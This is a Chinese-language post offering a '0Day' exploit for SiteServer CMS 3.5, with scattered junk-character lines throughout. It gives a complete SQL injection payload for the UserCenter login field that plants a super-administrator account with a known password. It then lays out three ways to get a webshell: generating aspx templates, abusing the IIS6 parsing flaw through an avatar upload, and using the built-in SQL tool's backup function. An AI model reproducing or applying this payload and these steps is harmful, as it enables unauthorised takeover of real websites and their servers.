SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

stieserver官网:www.siteserver.cn
  B$ A) x2 q7 Y

0 ~1 W( n1 u* a1 _& Y3 L7 M
EXP:
3 K2 ?/ E' h  _: S' k
直接访问UserCenter/login.aspx

) X3 r) J) G& A4 p9 k
4 t6 k1 x9 R! e7 T
用户名处输入：
1 }: [9 A% ~2 q
7 A! O% `( U9 r1 f* l: w; W5 q123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

: D. W! t5 J; U- p& `  r% H1 @
+ E9 ^) ?, @4 X! N! ]1 u* X
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。


- H* d" U1 _4 _/ G& S
之后再访问后台SiteServer/login.aspx用插入的用户登陆
$ M, \- V4 I1 d9 H, a0 d! l% S

# }# o' T% F7 O+ l3 u. ]3 ^8 R
后台拿webshell的三种方法：

一、
' I/ h* x1 y, ?$ p4 j" g: P, D
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、

成员权限-》添加用户-》用户名为：1.asp
* q* W+ P& Q. p. w1 M: h) _: x
http://127.0.0.1/usercenter/
6 O& ]7 ]9 F' w) w! `. S
  O; l: C% G3 B5 w8 T; c: C& x用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
& b+ v0 n8 F; f/ d  k- X9 j
（ps：后台添加用户时不会验证是否含有非法字符）
1 p$ ^2 F8 ?: n* g, x4 a
三、

* ^# w1 s/ C: A系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径

1 Z* G  A0 |- J2 G系统工具-》数据库工具-》SQL语句查询
5 U9 s9 \2 c+ e3 b7 ]% f这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。